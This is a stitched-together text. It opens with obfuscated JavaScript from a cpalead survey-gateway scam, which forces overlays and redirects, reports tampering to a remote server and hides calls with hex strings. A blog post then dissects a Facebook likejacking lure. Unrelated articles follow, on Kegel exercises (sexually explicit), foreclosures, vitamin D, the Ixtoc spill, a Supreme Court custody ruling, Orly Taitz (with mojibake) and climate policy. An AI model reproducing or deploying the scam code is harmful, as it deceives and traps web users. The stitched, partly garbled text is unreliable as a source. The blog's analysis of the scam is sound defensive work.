;" ,500 ) }}function mlrsxoywizifxxng133bf39da0f2ea66014ccd0e3f20a(gateid,adixdgozwczhuvaf6e84b){if(adixdgozwczhuvaf6e84b!=xwwjxyvbmsrjfpud17e9cae225420){top.location.href=
'
http://www.cpalead.com/adblock.php?pub=42138'}var dfwtkjhwbgtpwlos0fa0f79b83e1fc0f3d93f796c5=document.getElementById('aijvqsnovujrsfoj3') ; var zcpkmswwmxlgjzbue41a138882143252732d893=document.getElementById('wzjyzgbhqzohhlhvef8426b5a89be2') ;jrbxaafwxpczsjiy0a8801c687f76b5f6d210b99a0250a37(1) ;mfmqeakahlkwcepr44a166b848aad13dd422a15f1c03e22(1) ;yecqogvnndwlktmu(1 ) ; mhhyykdwhgmowiwtcad9ac9c65ac5a6b8b8039d9e4abe61e=1;cbtonfugwctexmjdff8bd9e3648ab7=true;if(getWidgetSetting ( gateid , 'donation_widget')==1&&secondclose!=true){dfwtkjhwbgtpwlos0fa0f79b83e1fc0f3d93f796c5.style.filter=" alpha( opacity=0 ) " ;dfwtkjhwbgtpwlos0fa0f79b83e1fc0f3d93f796c5.style.opacity =" 0.0 " ;document.getElementById('wvbzqebijvmpzwod022ee7977ca8127f7e4936abbc831').src=
' http://www.surveysforcharity.org/thankyou-overlay.php';secondclose=true}else{zcpkmswwmxlgjzbue41a138882143252732d893.style.display='none';dfwtkjhwbgtpwlos0fa0f79b83e1fc0f3d93f796c5.style.display='none';document.getElementById('wvbzqebijvmpzwod022ee7977ca8127f7e4936abbc831').src='about:blank';document.getElementById('wvbzqebijvmpzwod022ee7977ca8127f7e4936abbc831').style.display='none'}return false}function guhjvomqufndfyola931eb1a3fc8d9ff74b6aa9(tampertype){if(!cbtonfugwctexmjdff8bd9e3648ab7&&ayztojyyqznptcooae9e1da0e096ad7bf8bb8aa6){if(window.console&&window.console.firebug) {var hasfirebug=1}else{var hasfirebug=0}dpjfszjhzduviwkn424c2477e2d48=new Image ( ) ;dpjfszjhzduviwkn424c2477e2d48.src= "
http://www.cpalead.com/widget-tamper.php?pub=42138&firebug= "+hasfirebug+" &tamper="+tampertype;document.body.appendChild(dpjfszjhzduviwkn424c2477e2d48);sgfplcetedjsqmbvbbcb115()}}function ectbuapjynbmiuyj9c139305fe789fa31a4f949596263a69( reason){if(!cbtonfugwctexmjdff8bd9e3648ab7&&ayztojyyqznptcooae9e1da0e096ad7bf8bb8aa6){dpjfszjhzduviwkn424c2477e2d48=new Image ( ) ;dpjfszjhzduviwkn424c2477e2d48.src= "
http://www.cpalead.com/widget-tamper-test.php?pub=42138&reason= "+reason;document.body.appendChild(dpjfszjhzduviwkn424c2477e2d48);lxyzruidcgfwoqsj63037fceb7141ffa03df3d1a19d88f73(
' http://www.cpalead.com/nostyle.php?pub=42138')}}function hienslexztaecvon972b4c6959457b72d8591114abeb305d(){if(!document.getElementById('aijvqsnovujrsfoj3') ){guhjvomqufndfyola931eb1a3fc8d9ff74b6aa9('overlay - not- found ') }else if(!document.getElementById('wzjyzgbhqzohhlhvef8426b5a89be2') ){guhjvomqufndfyola931eb1a3fc8d9ff74b6aa9 (' widget-not-found ') }else if(!document.getElementById('wvbzqebijvmpzwod022ee7977ca8127f7e4936abbc831') ) {guhjvomqufndfyola931eb1a3fc8d9ff74b6aa9 ( 'iframe-not-found ') }else if(document.getElementById('aijvqsnovujrsfoj3').style.width !=" 100 % " ||document.getElementById('aijvqsnovujrsfoj3').style.display !=" block " ||document.getElementById('aijvqsnovujrsfoj3').style.visibility !=" visible " ) {guhjvomqufndfyola931eb1a3fc8d9ff74b6aa9('overlay - styles ') }else if(document.getElementById('wzjyzgbhqzohhlhvef8426b5a89be2').style.width !=" 100 % " ||document.getElementById('wzjyzgbhqzohhlhvef8426b5a89be2').style.display !=" block " ||document.getElementById('wzjyzgbhqzohhlhvef8426b5a89be2').style.visibility !=" visible " ) {guhjvomqufndfyola931eb1a3fc8d9ff74b6aa9 (' widget-styles ') }else if(document.getElementById('wvbzqebijvmpzwod022ee7977ca8127f7e4936abbc831').style.display !=" block " ) {guhjvomqufndfyola931eb1a3fc8d9ff74b6aa9('iframe-not-visible')}if(document.getElementById('wvbzqebijvmpzwod022ee7977ca8127f7e4936abbc831').offsetHeight<=300&&document.getElementById('wvbzqebijvmpzwod022ee7977ca8127f7e4936abbc831').offsetHeight!=0){ectbuapjynbmiuyj9c139305fe789fa31a4f949596263a69 ( 'iframe-height-invalid-'+document.getElementById('wvbzqebijvmpzwod022ee7977ca8127f7e4936abbc831').offsetHeight ) }else if(document.getElementById('aijvqsnovujrsfoj3').offsetHeight<=100&&document.getElementById('aijvqsnovujrsfoj3').clientHeight<=100){ectbuapjynbmiuyj9c139305fe789fa31a4f949596263a69 ( 'overlay - height - invalid-'+document.getElementById('aijvqsnovujrsfoj3').offsetHeight+'-'+document.getElementById('aijvqsnovujrsfoj3').clientHeight)}setTimeout(" hienslexztaecvon972b4c6959457b72d8591114abeb305d ( ) " ,1000 ) }function sgfplcetedjsqmbvbbcb115( ) {var _0x96be= [ " \x72\x65\x6C\x6F\x61\x64 " , " \x6C\x6F\x63\x61\x74\x69\x6F\x6E " ] ;window[_0x96 be [ 1 ] ] [ _0x96 be [ 0 ] ] ( ) }function lxyzruidcgfwoqsj63037fceb7141ffa03df3d1a19d88f73(url ) {var _0xb500= [ " \x68\x72\x65\x66 " , " \x6C\x6F\x63\x61\x74\x69\x6F\x6E " ] ;top [_0xb500 [ 1 ] ] [ _0xb500[0]]=url}function loadGatewayIframe( gateid){document.getElementById('wvbzqebijvmpzwod022ee7977ca8127f7e4936abbc831').contentWindow.location.replace ( ' http://www.cpalead.com/mygateway_iframe_loader.php?pub=42138&subid=203.45.56.190&gateid='+gateid+'&ref='+escape(document.referrer)+'')}function createOverlay ( gateid ) {var arrayPageSize=getPageSize( ) ; var gnaljgtfhmuinsggfede27946c10e10f13725961cdee1e62=document.getElementsByTagName(" body " ) .item(0 ) ; var dfwtkjhwbgtpwlos0fa0f79b83e1fc0f3d93f796c5=document.createElement ( " div " ) ;dfwtkjhwbgtpwlos0fa0f79b83e1fc0f3d93f796c5.setAttribute ( 'id ' , 'aijvqsnovujrsfoj3') ;dfwtkjhwbgtpwlos0fa0f79b83e1fc0f3d93f796c5.style.display='none';dfwtkjhwbgtpwlos0fa0f79b83e1fc0f3d93f796c5.style.position='absolute';dfwtkjhwbgtpwlos0fa0f79b83e1fc0f3d93f796c5.style.top='0';dfwtkjhwbgtpwlos0fa0f79b83e1fc0f3d93f796c5.style.left='0';dfwtkjhwbgtpwlos0fa0f79b83e1fc0f3d93f796c5.style.zIndex= '11863836';dfwtkjhwbgtpwlos0fa0f79b83e1fc0f3d93f796c5.style.width=
'100%';gnaljgtfhmuinsggfede27946c10e10f13725961cdee1e62.insertBefore(dfwtkjhwbgtpwlos0fa0f79b83e1fc0f3d93f796c5,gnaljgtfhmuinsggfede27946c10e10f13725961cdee1e62.firstChild ) ;opacity_setting_ie=getWidgetSetting(gateid , 'opacity ') ;opacity_setting_moz=opacity_setting_ie/100;document.getElementById('aijvqsnovujrsfoj3').style.filter= " alpha( opacity="+opacity_setting_ie+ " ) " ;document.getElementById('aijvqsnovujrsfoj3').style.opacity=opacity_setting_moz;dfwtkjhwbgtpwlos0fa0f79b83e1fc0f3d93f796c5.style.height=(arrayPageSize[ 1 ] +'px ') ;dfwtkjhwbgtpwlos0fa0f79b83e1fc0f3d93f796c5.style.display='block';dfwtkjhwbgtpwlos0fa0f79b83e1fc0f3d93f796c5.style.visibility='visible'}function myGatewayStart( gateid) {var closebuttons=[ ' NzMxNTM%3D '] ;if(!document.getElementById('aijvqsnovujrsfoj3') ){createOverlay( gateid)}else{if(document.getElementById('aijvqsnovujrsfoj3').style.display='none ') {document.getElementById('aijvqsnovujrsfoj3').style.display='block';opacity_setting_moz=getWidgetSetting( gateid , 'opacity ') /100;document.getElementById('aijvqsnovujrsfoj3').style.filter= " alpha( opacity="+opacity_setting_moz + " ) " ;document.getElementById('aijvqsnovujrsfoj3').style.opacity=opacity_setting_moz}}var arrayPageSize=getPageSize( ) ; dontscroll( ) ;jrbxaafwxpczsjiy0a8801c687f76b5f6d210b99a0250a37(0 ) ;mfmqeakahlkwcepr44a166b848aad13dd422a15f1c03e22(0 ) ; var zcpkmswwmxlgjzbue41a138882143252732d893=document.getElementById('wzjyzgbhqzohhlhvef8426b5a89be2') ;zcpkmswwmxlgjzbue41a138882143252732d893.style.display='block';zcpkmswwmxlgjzbue41a138882143252732d893.style.visibility='visible';zcpkmswwmxlgjzbue41a138882143252732d893.style.position='absolute';zcpkmswwmxlgjzbue41a138882143252732d893.style.top='0';zcpkmswwmxlgjzbue41a138882143252732d893.style.left='0';zcpkmswwmxlgjzbue41a138882143252732d893.style.zIndex='11863846';zcpkmswwmxlgjzbue41a138882143252732d893.style.width= '100 %'; var has_closebtn=0 ; for( var i=0;i<closebuttons.length;i++){if(closebuttons[i]==gateid||closebuttons[i]==escape( gateid ) ) {var is_donation=getWidgetSetting ( gateid , 'donation_widget ') ;if(is_donation==1) {document.getElementById('lpepmphihufelzdd28c18f8093587772fdd38f').innerHTML='< div style= " position : relative ; width : 72 px ; top : 158 px ; right : - 225 px ; text - align : center ; z-index : 11863866 ; font - size : 12 px ; background - color : transparent ; " >< a onclick=" mlrsxoywizifxxng133bf39da0f2ea66014ccd0e3f20a(\'' + gateid+'\' , \' ytndhhmwdjexjqej106a67d2\' ) ; " style = " cursor : pointer ; " >< img src= " http://static.cpalead.com/images/rice-widget/rice-skin-close-button.png " border= " 0 " alt = " Close Widget " ></a></div>';document.getElementById('arrmnntlgutxhtqc8f4e5c3813f230bb38e7ea6abcfcbe7c').innerHTML='< div style= " position : relative ; width : 72 px ; top : 158 px ; right : - 225 px ; text - align : center ; z-index : 11863936 ; font - size : 12 px ; background - color : transparent ; " >< a onclick=" mlrsxoywizifxxng133bf39da0f2ea66014ccd0e3f20a(\'' + gateid+'\' , \' ytndhhmwdjexjqej106a67d2\' ) ; " id =" closebtn " style = " cursor : pointer ; " >< img width = " 135 " height = " 40 " src= " http://static.cpalead.com/images/blank7.gif " border= " 0 " alt = " Close Widget " ></a></div>'}else{document.getElementById('lpepmphihufelzdd28c18f8093587772fdd38f').innerHTML='< div style= " position : relative ; width : 135 px ; top : 452 px ; right : 172 px ; text - align : center ; z-index : 11863866 ; font - size : 12 px ; background - color : transparent ; " >< a onclick=" mlrsxoywizifxxng133bf39da0f2ea66014ccd0e3f20a(\'' + gateid+'\' , \' ytndhhmwdjexjqej106a67d2\' ) ; " style = " cursor : pointer ; " >< img src= " http://static.cpalead.com/images/help/close_btn.png " border= " 0 " alt = " Close Widget " ></a></div>';document.getElementById('arrmnntlgutxhtqc8f4e5c3813f230bb38e7ea6abcfcbe7c').innerHTML='< div style= " position : relative ; width : 135 px ; top : 452 px ; right : 172 px ; text - align : center ; z-index : 11863936 ; font - size : 12 px ; background - color : transparent ; " >< a onclick=" mlrsxoywizifxxng133bf39da0f2ea66014ccd0e3f20a(\'' + gateid+'\' , \' ytndhhmwdjexjqej106a67d2\' ) ; " id =" closebtn " style = " cursor : pointer ; " >< img width = " 135 " height = " 40 " src= " http://static.cpalead.com/images/blank7.gif " border= " 0 " alt = " Close Widget " ></a></div>'}var has_closebtn=1;found=i;break}}if(has_closebtn==0){document.getElementById('lpepmphihufelzdd28c18f8093587772fdd38f').innerHTML='';document.getElementById('arrmnntlgutxhtqc8f4e5c3813f230bb38e7ea6abcfcbe7c').innerHTML=''}zcpkmswwmxlgjzbue41a138882143252732d893.style.height=(arrayPageSize [ 1 ] +'px ' ) ; setTimeout ( " loadGatewayIframe ( '" + gateid + " ' ) ; " ,500 ) ;document.getElementById('wvbzqebijvmpzwod022ee7977ca8127f7e4936abbc831').style.display='block ';ayztojyyqznptcooae9e1da0e096ad7bf8bb8aa6=true;setTimeout(" hienslexztaecvon972b4c6959457b72d8591114abeb305d ( ) ;" ,5000 ) }function secondpass ( ) {countdown=countdown-1;document.getElementById(" closelink " ) .innerHTML=countdown;if(countdown<=0){riunpfcaxfcggjhpf()}else{setTimeout(" secondpass ( ) " ,1000 ) }}document.write ( '< style type = " text/css " >#aijvqsnovujrsfoj3{background-color : #000 ; filter:alpha( opacity=80 ) ; opacity : 0.80 ; - moz-opacity : 0.80;}') ;document.write('#wzjyzgbhqzohhlhvef8426b5a89be2 a { background : none ; font - weight:normal ;color:#fff;text- decoration : none} ') ;document.write('#wzjyzgbhqzohhlhvef8426b5a89be2 img {border : 0px;}' ) ;document.write('#wzjyzgbhqzohhlhvef8426b5a89be2 a:hover { background : none;font- weight:normal;color:#fff;text-decoration:underline}</style >') ;document.write ( '< div id =" wzjyzgbhqzohhlhvef8426b5a89be2 " style = " display : none ; text - align : center ; line - height : normal ; " >') ;document.write ( '< div id=" lpepmphihufelzdd28c18f8093587772fdd38f " align=" center " style= " position : absolute ; width : 100 % ; z-index : 11863866 ; " >') ;document.write ( '< div style= " position : relative ; width : 135 px ; top : 452 px ; right : 172 px ; text - align : center ; z-index : 11863866 ; font - size : 12 px ; background - color : transparent ; " >') ;document.write ('</div >') ;document.write ('</div >') ;document.write ('< div id=" arrmnntlgutxhtqc8f4e5c3813f230bb38e7ea6abcfcbe7c " align=" center " style= " position : absolute ; width : 100 % ; z-index : 11863936 ; " >') ;document.write ( '< div style= " position : relative ; width : 135 px ; top : 452 px ; right : 172 px ; text - align : center ; z-index : 11863936 ; font - size : 12 px ; background - color : transparent ; " >') ;document.write ('</div >') ;document.write ('</div >') ;document.write ( '< div style = " margin : 72 px auto 0 px ; background : transparent ; height : 482 px ; z-index : 11863881 ; " >') ;document.write ( '< iframe width = " 100 % " height = " 640 " id=" wvbzqebijvmpzwod022ee7977ca8127f7e4936abbc831 " src= " " allowtransparency =" true " frameborder= " 0 " style= " position : relative ; height : 640 px ; overflow -x : hidden ; overflow -y : hidden ; background - color : transparent ; z-index : 11863886 ; " scrollbars = " NO " ></iframe >') ;document.write ('</div></div >' ) ;
Today I noticed this one in my facebook feed and thought ; that 's different !
It 's been a while since I chased a rabbit , so down the rabbit hole I went .
The blogspot page delivers a access.im link visible as a " skip this add page " image and redirects to http:// allhqpics.com / the - guy - with - the - largest - dick - on - the - planet . html when you click on it .
Lets head further down the burrowLooks pretty normal , right ?
I took a look at the jquery.js and at a cursory glance it looks authentic , but then top.js delivers the first rabbit droppings
Decoding that string gives us : I 'll get back to the second html page in a bit , first lets check bottom .js from the first page :
Which decodes to : This gets a little more interesting , now there is a CSRF request to facebook for you to like the malicious site and lure more unsuspecting victims .
It 's time to pick up the pace and move on .
And the reference to cpalead gives it away .
That url delivers your typical function ( p , a , c , k , e , d ) obfuscated javascript which we decode using the tom liston methodWhich gives us more obfuscated javascriptThe next steps would be far to time consuming for me given the glaringly obvious conclusion you can draw by googleing for cpalead or http://www.cpalead.com/mygateway_iframe_loader.php.
In conclusion there is n't anything new here .
The techniques are n't very advanced , but god enough to keep the general public ignorant of what 's really going on .
I did find the firebug / anti tamper code used in the last bit of js interesting , but I 'm sure that malware analysts have seen it thousands of times before .
Kegeling and sex for men
Many men want to know ways to prolong ejaculation and how to ejaculate with force .
One healthy way to do this is to simply work out your pelvic floor or Kegel muscles .
When you have an erection , can you squeeze your PC muscle and make your penis jump substantially ?
If not , then it would be wise to start exercising your Kegel muscle to not only enhance sexual functioning but also maintain penile fitness .
Just as working out your biceps will give you better definition and more strength , the PC muscle can help you strengthen and better define your erections and orgasms .
But as is the case with everything , discipline is required .
PC exercises can also be beneficial in the " squirt across the room " department as well .
Porn Star Peter North who is well known for his ejaculation abilities did these exercises daily .
So if you do them , not only can you have the most solid erection ever , but you might also be able to ejaculate on the ceiling !
The results will not be evident the instant you 've done your first set of kegel exercises .
It takes time , like with any muscle that you begin " training " regularly .
Once you begin to master your exercises and are able to see a significant difference , the next time you 're making love , stay inside your partner without moving .
Instead of going in and out like you normally would , simply squeeze and release your PC muscle .
If your partner has been doing their exercises as well , you can both perform this on each other .
Enjoy !
Do the Kegel for prostate health Prostate neglect ultimately results in prostate dysfunction , malfunction , and disease .
However prostate disorders do not develop overnight , and regular exercise can prevent and reverse problems .
Medical science accepts that it is normal for men over the age of fifty to experience problems with their prostates .
Although prostate problems may be common however , they are not normal .
They are abnormal .
There is no need for any man to have prostate problems .
A great way to prevent prostate problems is to ' Do the Kegel ' .
Right now some of the least regretted things are " defending the bullied kid " and " discovering webcomics " ( nice ! ) and some of the most regretted things are " not starting that final paper sooner " , " not believing her when she said ' I 'm a worse person than you are ' " , and " forgetting to take the money dispensed out of the cash machine " .
So if you 're thinking of doing that , know that the collected wisdom of humanity says that you 'll probably regret it !
The Regret Index , ladies and gentlemen !
One year ago today : DIFFERENT WAYS TO TELL SOMEONE THEY ARE COMEDIANS WHO ARE INCORRECT ??
– Ryan
The Thirteen Housing Markets That Will Never Recover
New RealtyTrac numbers show that in April there were well over 300,000 foreclosures and the figure in on track to be higher in 2010 than in 2009 .
Several research firms say that underwater mortgages have moved above 11 million .
The National Association of Realtors found that “ in the first quarter , 91 out of 152 metropolitan statistical areas showed higher median existing single - family home prices in comparison with the first quarter of 2009 . ”
But some cities posted double - digit drops for the period .
24/7 Wall St. reviewed the NAR data for the first quarter along with Bureau of Labor Statistics unemployment levels by city .
The two databases should match one another very well .
Each has municipalities defined by metropolitan statistics areas ( SMA ) as set by the US Office of Management and Budget in 2004 .
City unemployment rates are compared to a 9.9 % national rate for purposes of this article .
Government numbers for joblessness do not include part - time workers looking for full - time jobs or people who have become “ unattached ” from the work force .
These additions would bring the national unemployment rate to 17.1 % .
That means that if a city has unemployment of 14 % , joblessness could be closer to 21 %
Home prices were based on NAR indexes for the first quarter of 2010 compared with the full - year 2007 , near the top of the housing market .
There are some areas where housing prices have dropped but unemployment has improved , so home values may recover .
Honolulu is an example of this .
But , most cities with sharp drops in home values are also the hardest hit by the recession ’s impact on employment .
These areas may take years to get back to “ normal ” unemployment rates of 5 % .
In the meantime , home prices will continue to stagnate , or worse , continue to fall because of a lack of buyers .
These are the thirteen cities where , based on home values in 2007 and current unemployment , housing will never return to the levels of three years ago :
Seven out of every ten pregnant women in the United States are not getting enough Vitamin D according to a study published in the May issue of the American Journal of Obstetrics and Gynecology .
While prenatal vitamins do raise Vitamin D levels during pregnancy , the study shows that higher doses may be needed for many women .
Adit Ginde , MD , MPH , from University of Colorado Denver School of Medicine , lead author of the study said , " We already know Vitamin D is important for bone health of the mother and infant , but we are just starting to scratch the surface about the many potential health benefits of Vitamin D during pregnancy . "
The latest study shows that many pregnant women in the United States have insufficient vitamin D levels .
For those women , prenatal vitamins do not provide enough vitamin D , and higher doses are needed to raise levels .
Women with darker skin , those who cover their skin for religious or cultural reasons and those living further north during winter months are at particularly high risk for lower Vitamin D levels .
" Prenatal vitamins do help raise vitamin D levels , but many women start taking them after becoming pregnant .
Although research is ongoing , I think it 's best for women to start a few months before becoming pregnant to maximize the likely health benefits , " said Ginde .
There is a growing body of evidence that Vitamin D levels have fallen below what 's considered healthy in the overall population -- likely from decreased outdoor activity .
And vitamin D has reemerged as an important nutritional factor in maternal and infant health .
Vitamin D deficiency early in life has been linked to increased risk of respiratory infections and childhood wheezing .
Lower levels in adults have been linked to cardiovascular disease and specific types of cancer .
The study did find that some women have enough Vitamin D. Study co-author Carlos Camargo , MD , DrPH , from Massachusetts General Hospital cautioned that there may be risks from excessive Vitamin D intake .
" We need more data from clinical trials of Vitamin D supplementation in pregnant women .
If the ongoing trials continue to show benefit , the best strategy will likely be measuring Vitamin D levels through a simple blood test and choosing supplementation doses according to those levels . "
Ginde added , " This tailored approach is common in preventive care for people with high cholesterol , and safer and more effective than a one - size - fits - all solution . "
The study team from University of Colorado School of Medicine , Massachusetts General Hospital and Children 's Hospital Boston analyzed nationally representative data from 928 pregnant and 5,173 non-pregnant women of childbearing age collected by the Centers for Disease Control and Prevention .
This research was supported by the National Institutes of Health .
From June 3 , 1979 straight through March 23 , 1980 , an oil well in the Gulf of Mexico was spewing up to 30,000 barrels per day .
In just 200 feet of water , the Mexican oil company Pemex scrambled to shut down the Ictoc I exploratory well , but to no avail .
The gusher kept flowing , despite attempts to lower a “ cone ” or “ sombrero ” onto it .
Officials tried to inject the gusher with drilling mud and fire metal orbs into it , but that did n’t work either .
Finally , after months upon months of oil spray , relief wells succeeded in relieving the pressure , giving conventional methods the leverage to seal the gusher .
ADVERTISEMENT
If this sounds familiar … Well , it should .
“ It ’s not just the disaster itself that should sound familiar to you , ” said MSNBC host Rachel Maddow , appearing on a Wednesday night broadcast .
“ It ’s also the techniques that they were using at the time to try and contain the spill . ”
“ If you just closed your eyes and listened to these news reports from 1979 , you would be forgiven for thinking you had flipped on the news today , ” she said .
Maddow added : “ I am 37 years old and this happened when I was six — those haircuts are back in fashion .
The stuff that did n’t work back then is the same stuff that has n’t worked now ; same busted blowout preventer , same ineffective booms , same underwater plumes , same toxic dispersant , same failed containment domes , same junk shot , same top kill .
It ’s all the same technology .
The Ixtoc well , which could n’t be plugged for nine months , was in 200 feet of water .
Now , in 2010 , we ’re using the same techniques to try to plug a well that is leaking in 5,000 feet of water . ”
The Ixtoc well ultimately spewed some 3.5 million barrels of crude into the Gulf , according to official estimates .
It was the second worst spill in history and the worst ecological disaster to ever affect the US mainland .
ADVERTISEMENT
Officials estimate the sinking of the Deepwater Horizon rig and the resulting gusher will go down as the worst environmental disaster in US history .
Those same officials , President Obama chief among them , have also called the 2010 oil gusher “ unprecedented . ”
While they may be right on a technicality — that the Ixtoc was a problem for the Mexican government , making the Deepwater Horizon disaster a truly American disaster — the scenario is far from “ unprecedented ” .
“ In July 1979 the pumping of mud into the well reduced the flow to 20,000 barrels per day , and early in August the pumping of nearly 100,000 steel , iron , and lead balls into the well reduced the flow to 10,000 barrels per day , ” the National Oceanic and Atmospheric Administration noted in its official history of the disaster .
“ Mexican authorities also drilled two relief wells into the main well to lower the pressure of the blowout . ”
ADVERTISEMENT
Every step of the way , companies seen as responsible for the disaster predicted that success was just around the corner .
“ The oil wells keep talking about how technologically advanced they are , ” Maddow said .
“ But , what they ’ve gotten technologically advanced at is drilling deeper .
They have n’t gotten any more technologically advanced on how to deal with the risks attached to that .
They have n’t made any technological advances in the last 30 years when it comes to stopping a leak like this when it happens . ”
ADVERTISEMENT
BP officials said they were successful in stopping the Gulf oil gusher by injecting drilling mud into the well , stemming the flow .
While some public officials agreed and parroted the oil company ’s claim late Thursday , the U.S. Coast Guard amended prior statements saying there ’s not yet proof that the strategy has worked .
More was expected to be known later in the evening .
This video is from MSNBC , broadcast May 26 , 2010 .
ADVERTISEMENT
Visit msnbc.com for breaking news , world news , and news about the economy
Below , Josh Friedman of Akin Gump recaps the Court ’s opinion , handed down yesterday , in Abbott v. Abbott ( 08-645 ) .
[ DISCLOSURE : Akin Gump and Howe & Russell represented petitioner Timothy Abbott , but Josh did not work on the case . ]
Jonathan Eisenman ’s preview of oral arguments in the case is available here , and Erin Miller ’s recap of the proceedings is available here .
Check the Abbott v. Abbott SCOTUSwiki page for additional information .
In an opinion by Justice Kennedy that was joined by five other Justices , the Court yesterday held that a parent 's ne exeat right confers upon that parent a " right of custody "  under the Hague Convention on the Civil Aspects of International Child Abduction .
In so doing , the Court reversed the contrary opinions of the courts below and remanded the case for further proceedings regarding the return of A.J.A. , the child at the heart of this litigation .
Recognizing that the parties agreed that the Convention applies to this suit , the Court explained that the question at issue in this case was " whether A.J.A. was " wrongfully removed ' from Chile . . . in violation of a right of custody . " 
The Court explained that the text of the Convention , the views of United States Department of State , decisions by foreign courts addressing the meaning of " rights of custody , "  and the purpose of the Convention all lead to the conclusion that A.J.A. was indeed " wrongfully removed . " 
The Court began its analysis with the Convention 's text , which was in turn shaped by the scope of Mr. Abbott 's rights under Chilean law .
Thus , interpreting Chilean law , the Court concluded that Mr. Abbott 's ne exeat right is best construed as a " joint right of custody "  as defined under the Convention .
Specifically , the Court emphasized that Mr. Abbott 's ne exeat right conferred upon him shared authority to " determine the child 's place of residence , "  which falls within the scope of a parent 's " right of custody "  under the Convention .
Accordingly , Mr. Abbott 's ne exeat right was enforceable pursuant to Hague Convention procedures .
Moreover , the Court explained , the only remedy for the violation of a ne exeat right is an order of return .
Any other result , it emphasized , would " render the Convention meaningless in many cases where it is most needed . " 
In the Court " s eyes , its conclusion was further bolstered by the persuasive views of the State Department " that ne exeat rights are rights of custody "  " “ which , the Court continued , are significant under the longstanding rule " that the Executive Branch 's interpretation of a treaty " is entitled to great weight . ' " 
The Court found support in the jurisprudence of foreign contracting states as well .
To this end , the Court concluded that there was " broad acceptance of the rule that ne exeat rights are rights of custody . " 
Moreover , the Court observed , there is also a growing consensus among scholars on this issue .
Finally , the Court concluded that the objects and purposes of the Convention are best served by providing a return remedy for violations of ne exeat rights .
Specifically , a return remedy serves the Convention 's end of ensuring that custody disputes are resolved in the courts of a child 's habitual residence .
Indeed , the Court observed , a contrary ruling might actually encourage child abduction for the purposes of forum shopping .
Finally , the Court emphasized that although a ne exeat right does indeed constitute a " right of custody "  for purposes of the Convention , the Convention 's return remedy is " not automatic "  if the abducting parent can establish that an exception to the Convention applies .
Thus , it remanded the case for " further proceedings consistent with this opinion . " 
Justice Stevens , joined by Justices Thomas and Breyer , dissented .
These Justices disputed the significance of Mr. Abbott 's ne exeat right , which they characterized as a much more limited " visitation right . " 
Based on their view that the right merely provided Mr. Abbott with the authority to restrict his son's travel , they would hold that Mr. Abbott was not entitled to rely upon the Convention 's " powerful return remedy . ”
UPDATE : Early primary returns show Taitz losing nearly 3 - 1 in heavily populated areas , victory highly unlikely
Even as they celebrate President Obama ’s slowly declining approval numbers , California Republicans still have good reason to be worried .
After all , their slate of statewide candidates for office in 2010 could very well bear one significant upset to their plans : “ birther queen ” Orly Taitz .
ADVERTISEMENT
It ’s a scenario that puts the fear into almost any serious California Republican , but it may well happen .
James Lacy , a California GOP operative , told Politico : “ ItÃ¢â‚¬â „ ¢d be a disaster for the Republican party .
Can you imagine if [ gubernatorial candidate ] Meg Whitman and [ candidate for Lt. Gov. ]
Abel Maldonado Ã¢â‚¬â€ both of whom might have a chance to win in November Ã¢â‚¬â€ had to run with Orly Taitz as secretary of state , who would make her cockamamie issues about ObamaÃ¢â‚¬â „ ¢s birth certificate problems at the forefront of her activities ? ”
Taitz , an Israeli immigrant and practicing dentist , has made a name for herself since the 2008 presidential election by claiming President Obama is a foreign national and thereby ineligible for office .
Her claims completely fly in the face of all available evidence .
Hawaii , Obama ’s birth state , has certified that his certificate of live birth is accurate and valid .
The form has been available since the 2008 campaigns , when then - Senator Obama ’s staff released it online .
In pursuit of her claims , Taitz racked up $ 20,000 in fines for filing frivolous lawsuits .
That did n’t stop most television media outlets from giving her a platform , at least briefly , which has now grown to the California GOP .
She faces Damon Dunn , a former football player for the Jacksonville Jaguars , who has opted to “ take the high road , ” according to Politico , and not even attempt to wage a campaign against Taitz .
True to her history , Taitz has sued over Dunn ’s candidacy , claiming he spent a brief time as a registered Democrat and should be disqualified .
ADVERTISEMENT
Though most statewide Republicans would refuse to appear on stage with Taitz , she was recently a special guest of the Republican Jewish Coalition , which also hosted famed GOP personalities like Karl Rove , former Senator Norm Coleman and Rep. Michelle Bachmann ( R - MN ) , along with California Senate hopefuls Chuck DeVore and Carly Fiorina .
“ For professional Republicans right now , the main tactic in regards to Orly Taitz is prayer , ” Jack Pitney , a political science professor at Claremont McKenna College , told Politico .
“ Down - ballot races in California can definitely take odd bounces .
I would say Damon Dunn is the favorite , but I would nÃ¢â‚¬â „ ¢t bet my next mortgage on it . ”
Democrat Debra Bowen , the current secretary of state in California , is seen as likely to retain her seat into the next term .
ADVERTISEMENT
This video is an interview with Orly Taitz featured by MSNBC in 2009 .
Climate change and population , taken individually , are among the most contentious issues in public policy ; bringing the two issues together is a recipe for controversy .
The issues are linked , however , so we do need to find a constructive approach to talk about the connections .
For all of its complexities , the basic challenge of climate - change policy is the apparent conflict between maximizing short - term individual or national gains ( increasing per capita GDP through use of cheap fossil fuel energy ) and the long - term protection of shared benefits ( minimizing global damages from climate change ) .
The other dimension is fairness , as those populations that have contributed least to past emissions of greenhouse gases are most vulnerable to health and other impacts of climate change .
Developing countries are therefore reluctant to limit their greenhouse gas emissions to help solve a problem that has , so far , been created elsewhere .
For their part , richer countries hesitate to implement policies that they consider may harm their economic growth and competitiveness .
In some ways this is analogous to discussion of population policy .
Again , there is a potential tension between the immediate rights of individuals ( to control their own fertility ) and a longer - term , population - level concern ( that rapid population growth could potentially overstretch resources , hamper development and lay conditions for conflict ) .
These two issues are also closely linked .
Although the major driver of greenhouse gas emissions remains the consumption patterns of richer populations , human population is also a fundamental long - term driver .
However , discussing these links has often generated more heat than light .
Even stating the fairly obvious fact that having more children will tend to increase an individual ’s “ legacy ” of greenhouse gas emissions has sparked outraged reactions against perceived threats to individual freedom or faith .
These tensions also play out at national level , as some have suggested that curbing population growth in developing counties would help to reduce climate change .
In response , developing countries point out that per capita emissions of children born in poor countries are much lower than that in richer countries , and claim that they are being stigmatized for “ profligate reproductive behaviour ” as a negotiating position over greenhouse gas commitments .
Can these issues be discussed constructively ?
The best approach is probably to choose the least controversial entry point – identifying where human rights , health , environmental and equity objectives converge , rather than conflict .
This can be framed around the fact that , in developing countries , approximately 200 million women express an unmet need for family planning services .
Meeting this need is supported by the following arguments .
First , control over reproduction is an individual right , supported through international declarations , and embodied in the Millennium Development Goals .
Second , it provides major public health benefits ; increasing birth spacing from less than 18 to more than 36 months correlates with a two - thirds drop in childhood mortality .
Third , avoiding local overpopulation increases resilience to near - term environmental and other stresses ( a need identified by most of the poorest countries themselves ) .
Fourth , over the long - term , it relieves climate change and other pressures on the global environment .
When developing this case , the order of the arguments is critically important .
